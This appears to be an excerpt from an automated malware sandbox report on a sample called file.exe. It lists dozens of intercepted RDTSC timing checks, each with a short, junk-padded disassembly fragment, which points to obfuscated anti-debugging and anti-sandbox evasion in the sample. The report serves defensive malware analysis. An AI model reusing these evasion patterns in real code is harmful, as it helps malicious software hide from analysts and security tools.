                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C50 second address: D80C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD2D0DFA0D4h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D835AF second address: D835B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D835B3 second address: D835D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0CBh 0x00000007 push ebx 0x00000008 js 00007FD2D0DFA0C6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007FD2D0DFA0C8h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8637A second address: D863C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FD2D0B60AF5h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jmp 00007FD2D0B60AF0h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D863C3 second address: D863C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D14A second address: D8D150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D150 second address: D8D154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D154 second address: D8D166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007FD2D0B60AE6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D166 second address: D8D170 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2D0DFA0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BDCA second address: D8BDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD2D0B60AE6h 0x0000000a jmp 00007FD2D0B60AF1h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5A0 second address: D8C5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5BD second address: D8C5E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD2D0B60AF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f popad 0x00000010 js 00007FD2D0B60B05h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5E9 second address: D8C5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C728 second address: D8C751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FD2D0B60AEBh 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jl 00007FD2D0B60AE6h 0x00000016 jnp 00007FD2D0B60AE6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C751 second address: D8C765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD2D0DFA0CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D988F6 second address: D98900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD2D0B60AE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98BB6 second address: D98BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9901D second address: D99026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99026 second address: D9902B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9995E second address: D9996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD2D0B60AE6h 0x0000000a jne 00007FD2D0B60AE6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9996F second address: D99975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99975 second address: D99979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99979 second address: D9997D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C17C second address: D5C182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C182 second address: D5C21E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FD2D0DFA0C8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 call 00007FD2D0DFA0D5h 0x0000002e pushad 0x0000002f call 00007FD2D0DFA0D3h 0x00000034 pop edx 0x00000035 jmp 00007FD2D0DFA0CFh 0x0000003a popad 0x0000003b pop ecx 0x0000003c lea eax, dword ptr [ebp+1247DF3Ah] 0x00000042 or ecx, dword ptr [ebp+122D3503h] 0x00000048 nop 0x00000049 jmp 00007FD2D0DFA0D9h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C21E second address: D5C224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C2E3 second address: D5C30E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jp 00007FD2D0DFA0C8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FD2D0DFA0C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C30E second address: D5C312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C678 second address: D5C68A instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2D0DFA0C8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C68A second address: D5C68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C68E second address: D5C6A0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2D0D7C266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FD2D0D7C266h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C6A0 second address: BB1811 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, dx 0x0000000b push dword ptr [ebp+122D03D5h] 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FD2D075E618h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov ch, bh 0x0000002d call dword ptr [ebp+122D1BEEh] 0x00000033 pushad 0x00000034 sub dword ptr [ebp+122D320Ch], ecx 0x0000003a xor eax, eax 0x0000003c pushad 0x0000003d mov ax, cx 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 mov dword ptr [ebp+122D2CC4h], esi 0x0000004b mov dword ptr [ebp+122D364Fh], eax 0x00000051 jnc 00007FD2D075E62Bh 0x00000057 mov esi, 0000003Ch 0x0000005c clc 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 sub dword ptr [ebp+122D2CC4h], ebx 0x00000067 lodsw 0x00000069 jmp 00007FD2D075E61Dh 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 cld 0x00000073 jmp 00007FD2D075E61Ah 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c or dword ptr [ebp+122D320Ch], edi 0x00000082 nop 0x00000083 pushad 0x00000084 je 00007FD2D075E61Ch 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C8D3 second address: D5C916 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0D7C272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FD2D0D7C268h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FD2D0D7C279h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C9F0 second address: D5CA03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D075E61Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D111 second address: D5D129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0D7C274h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D440 second address: D5D446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D4F2 second address: D5D541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007FD2D0D7C26Ch 0x0000000a pop ebx 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edx, dword ptr [ebp+122D3523h] 0x00000015 lea eax, dword ptr [ebp+1247DF7Eh] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FD2D0D7C268h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 sub edi, 2B7C5853h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D541 second address: D5D548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D548 second address: D5D5B5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0D7C268h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D36CBh] 0x00000015 mov edx, dword ptr [ebp+122D353Bh] 0x0000001b lea eax, dword ptr [ebp+1247DF3Ah] 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007FD2D0D7C268h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b jmp 00007FD2D0D7C270h 0x00000040 nop 0x00000041 pushad 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 pushad 0x00000049 jmp 00007FD2D0D7C26Bh 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 pop eax 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D3E8 second address: D9D3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D3ED second address: D9D3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D3F3 second address: D9D3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D3FD second address: D9D403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D816 second address: D9D823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D9C8 second address: D9DA06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD2D0D7C266h 0x00000009 jnc 00007FD2D0D7C266h 0x0000000f jmp 00007FD2D0D7C277h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FD2D0D7C273h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DA06 second address: D9DA0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DA0A second address: D9DA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DA10 second address: D9DA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD2D075E61Dh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DA2A second address: D9DA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DA2F second address: D9DA46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2D075E622h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DBA3 second address: D9DBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DBAD second address: D9DBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DBB1 second address: D9DBB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2932 second address: DA2936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2936 second address: DA2952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD2D0D7C26Bh 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FD2D0D7C266h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2D67 second address: DA2D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD2D075E616h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2D74 second address: DA2D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2D7A second address: DA2D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2D85 second address: DA2D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2F1A second address: DA2F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2F21 second address: DA2F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD2D0D7C266h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3237 second address: DA3244 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007FD2D075E616h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA36E6 second address: DA36EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F1E second address: DA1F36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FD2D075E616h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FD2D075E618h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F36 second address: DA1F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0D7C26Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F48 second address: DA1F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA63BD second address: DA63C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA63C1 second address: DA63C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA63C5 second address: DA63E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD2D0D7C274h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA816E second address: DA8193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FD2D075E616h 0x0000000c popad 0x0000000d jmp 00007FD2D075E628h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA4F8 second address: DAA4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA4FC second address: DAA502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA502 second address: DAA51C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0D7C276h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA208 second address: DAA20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA20E second address: DAA218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD2D0D7C266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADE3A second address: DADE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADE40 second address: DADE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADE48 second address: DADE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1CE4 second address: DB1D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push ecx 0x0000000b jns 00007FD2D0D7C266h 0x00000011 jmp 00007FD2D0D7C272h 0x00000016 pop ecx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1D0F second address: DB1D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB211A second address: DB212D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD2D0D7C266h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FD2D0D7C266h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB22C3 second address: DB22C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2413 second address: DB2420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FD2D0D7C266h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2420 second address: DB2424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2424 second address: DB2430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD2D0D7C266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2430 second address: DB245C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2D075E621h 0x00000008 jmp 00007FD2D075E626h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB25AD second address: DB25CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0D7C276h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
